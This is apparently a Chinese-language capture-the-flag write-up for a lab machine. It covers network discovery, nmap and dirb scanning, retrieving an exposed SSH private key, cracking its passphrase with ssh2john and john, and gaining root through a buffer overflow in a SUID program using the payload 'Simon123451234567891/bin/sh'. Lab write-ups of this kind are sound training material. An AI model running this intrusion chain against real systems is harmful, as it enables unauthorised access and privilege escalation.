1.探测靶机IP
netdiscover -r 192.168.71.1/24
2.扫描靶机开放的服务
nmap -sV 192.168.71.101
针对特殊端口进行探测,尤其对开发大端口的http服务进行排查;
无信息
3.使用工具探测隐藏页面
dirb http://192.168.71.101:31337/
查看robots协议。robots协议是禁止爬虫爬取的地方。
依次查看地址
找到第一个flag
4.访问.ssh文件
然后考虑这些信息是否是一个文件,可以进行尝试
下载完后放桌面
进入桌面cd /home/web/desktop //web为用户名
5.连接ssh
ssh -i id_isa 用户名@靶场机器IP地址 用户名在认证文件authorized_key
ssh -i id_rsa simon@192.168.71.101
chmod xxx 文件 赋权
chmod 600 id_rsa
找文件 locate
locate ssh2john
使用ssh2john 将id_rsa密钥转换成John可以识别的信息
python2 /usr/share/john/ssh2john.py id_rsa>rsacrack
john被锁定 解除-> watch rm -rf /root/.john/john.rec
利用字典解密rsacrack信息
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack
找到密码starwars
连接ssh
6.提权限
输入id 查看权限
进入root目录
ls显示 flag 和文件read_message.c
提升权限首先查找具有root权限的文件
find / -perm -4000 2>/dev/null
文件read_message.c刚好出现在find / -perm -4000 2>/dev/null 中
cat文件read_message.c
char program[] = "/usr/local/sbin/message";
char buf[20];
char authorized[] = "Simon";
if (!strncmp(authorized, buf, 5)) {
printf("Hello %s! Here is your message:\n\n", buf);
// This is safe as the user can't mess with the binary location:
execve(program, NULL, NULL);
strncmp()
如果返回值 < 0,则表示 str1 小于 str2。
如果返回值 > 0,则表示 str1 大于 str2。
如果返回值 = 0,则表示 str1 等于 str2。
buf[20];20个字符
如果输入溢出了,会回复什么。
输入溢出,然后跳转到bin目录下,尝试一下。通过下面一条命令来提升权限
运行文件 直接输入read_message
Simon123451234567891/bin/sh 20个字符
1937
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
